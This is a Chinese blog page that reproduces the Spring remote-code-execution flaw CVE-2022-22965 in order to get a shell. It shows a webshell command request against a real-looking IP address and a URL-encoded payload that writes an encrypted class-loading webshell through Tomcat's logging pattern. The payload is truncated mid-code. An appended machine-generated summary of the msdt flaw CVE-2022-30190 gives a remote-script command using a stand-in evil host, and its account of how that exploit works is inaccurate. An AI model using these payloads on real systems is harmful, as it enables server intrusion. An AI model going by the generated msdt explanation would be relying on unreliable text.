CVE-2022-22965:Spring远程代码执行漏洞复现

CVE-2022-22965:Spring远程代码执行漏洞复现&getshell骚操作
摘要由CSDN通过智能技术生成

CVE-2022-22965
在这里插入图片描述利用一键化工具可以检测到该漏洞可以RCE
在这里插入图片描述

http://82.157.246.36:49158/tomcatwar.jsp?pwd=j&cmd=whoami

在这里插入图片描述发现可以执行,但是利用此种方法是无法获取到webshell或是直接上线的。换一种方法打
在这里插入图片描述
poc:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=<%25{
   sign}i!+String+xc%3d"3c6e0b8a9c15224a"%3b+String+pass%3d"pass"%3b+String+md5%3dmd5(pass%2bxc)%3b+class+X+extends+ClassLoader{
   public+X(ClassLoader+z){
   super(z)%3b}public+Class+Q(byte[]+cb){
   return+super.defineClass(cb,+0,+cb.length)%3b}+}public+byte[]+x(byte[]+s,boolean+m){
   +try{
   javax.crypto.Cipher+c%3djavax.crypto.Cipher.getInstance("AES")%3bc.init(m%3f1%3a2,new+javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"))%3breturn+c.doFinal(s)%3b+}catch+(Exception+e){
   return+null%3b+}}+public+static+String+md5(String+s)+{
   String+ret+%3d+null%3btry+{
   
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值